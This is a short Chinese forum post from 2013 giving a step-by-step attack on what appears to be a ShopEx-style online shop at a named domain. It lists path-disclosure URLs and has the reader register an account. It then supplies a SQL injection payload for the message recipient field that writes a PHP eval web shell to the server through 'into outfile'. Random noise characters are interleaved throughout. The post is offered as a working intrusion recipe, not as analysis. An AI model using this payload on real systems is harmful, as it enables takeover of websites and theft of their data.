第一个:想办法找到目标网站的绝对路径, ^: Q+ N: U2 j8 ]: r5 }
1 u7 L- f4 G3 A: L* y+ ^6 lhttp://www.political-security.com/install/svinfo.php?phpinfo=true
K/ v5 I' q( _9 `% R' f, ] y. y$ ]% Q7 ^" O) ]0 v8 R
http:/www.political-security.com/core/api/shop_api.php
1 D M3 v' q, L3 K$ S: p; D4 ~+ q2 l4 E' V7 K* {, \
http://www.political-security.co ... api_b2b_2_0_cat.php1 @5 m d9 q; p1 W! r% K
0 P6 {7 O5 a8 s3 m- L$ U7 q& Ehttp://www.political-security.com/core/ap ... b_2_0_goodstype.php( d1 o" {8 ?) v! [! J7 C
- Z( y+ d; ^+ D7 i) n+ ]
http://www.political-security.co ... i_b2b_2_0_brand.php
6 {9 S& j7 H! i) i/ r( ]第二个:注册一个普通用户
8 j0 ~' S; P7 T7 s9 g+ }: Q/ O3 F2 h# R8 W. T& N4 e/ ]; x
http://www.political-security.com/?passport-signup.html2 q1 o: R, a$ T0 e
- C/ R) E$ {" z* o1 [- u% B第三个: 发送消息 # _# F# A" m) v% Q4 a' t: S* k
: F3 L% @0 U) C( |8 M
http://www.political-security.com/?member-send.html+ N Q1 S6 C$ Z! X
发送给中填写
' M' Z5 P- B% D+ ?7 H9 G+ Qantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |
发表于 2013-2-27 21:28:28
收藏
支持
反对